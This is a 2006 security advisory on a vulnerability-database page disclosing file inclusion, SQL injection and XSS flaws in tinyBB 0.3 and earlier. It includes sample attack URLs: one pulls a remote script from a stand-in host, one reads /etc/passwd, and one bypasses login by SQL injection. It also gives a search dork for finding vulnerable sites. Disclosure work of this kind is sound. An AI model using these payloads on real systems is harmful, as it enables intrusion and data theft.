Lucene search
SecurityvulnsSECURITYVULNS:DOC:12870HistoryMay 30, 2006 - 12:00 a.m.
Advisory: tinyBB <= 0.3 Multiple Remote Vulnerabilities.
2006-05-3000:00:00
vulners.com
16
βSecurity Reportβ
Advisory: tinyBB <= 0.3 Multiple Remote Vulnerabilities.
Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI
Date: 27/05/06 05:37 AM
Contacts:{
ICQ: 10072
MSN/Email: [email protected]
Web: http://www.nukedx.com
}
Vendor: Epicdesigns (http://www.epicdesigns.co.uk/)
Version: 0.3 and prior versions must be affected.
About: Via this methods remote attacker can include arbitrary files to
tinyBB.tinybb_footers variable in
footers.php did not sanitized before using it.You can find vulnerable
code in footers.php at line 3
-Source in footers.php-
3: if (strlen($tinybb_footers) > 0) { require_once($tinybb_footers); }
-End of source-
Fixing this vulnerability so easy turn off register_globals.
There is also SQL injection in forgot.php.Parameter $q did not
sanitized properly before using it on SQL query.
You can find vulnerable codes in forgot.php at lines 3-18.
-Source in forgot.php-
3: if (isset($q)) {
4: $sql="SELECT COUNT() FROM tinybb_members WHERE username='$q' OR
email='$q'";
5: $count = mysql_result(mysql_query($sql),0);
β¦
-End of source-
Also this can be caused to XSS.You can find vulnerable code in
forgot.php at line 19-21
-Source in forgot.php-
19: else {
20: echo "<p>The query <b>$q</b> could not be β¦
21: }
-End of source-
There is another SQL injection in login.php.Parameters username and
password did not sanitized properly before using
it on SQL query.You can find vulnerable codes in login.php at line 2-8
-Source in login.php-
8: $sql="SELECT count() FROM tinybb_members WHERE flag='1' AND
username='$username' AND password='$password'";
-End of source-
I didnt wrote all vulnerabilities on tinyBB there is too many SQL
injections and XSS vulnerabilities on this tiny
bulletin board.
Level: Highly Critical
How&Example:
Succesful exploitation needs allow_url_fopen set to 1 and register_globals on
GET -> http://[victim]/[tBBPath]/footers.php?tinybb_footers=evilscript
EXAMPLE ->
http://[victim]/[tBBPath]/footers.php?tinybb_footers=http://yourhost.com/cmd.txt?
If magic_quotes_gpc off remote attacker can include local files too
EXAMPLE -> http://[victim]/[tBBPath]/footers.php?tinybb_footers=/etc/passwd%00
SQL injection on login.php
GET ->
http://[victim]/[tBBPath]/login.php?username=heh//or//isnull(1/0)/*&password=nothing
Timeline:
- 27/05/2006: Vulnerability found.
- 27/05/2006: Contacted with vendor and waiting reply.
Exploit: http://www.nukedx.com/?getxpl=33
Original advisory can be found at: http://www.nukedx.com/?viewdoc=33
Dorks: "Powered by tinyBB"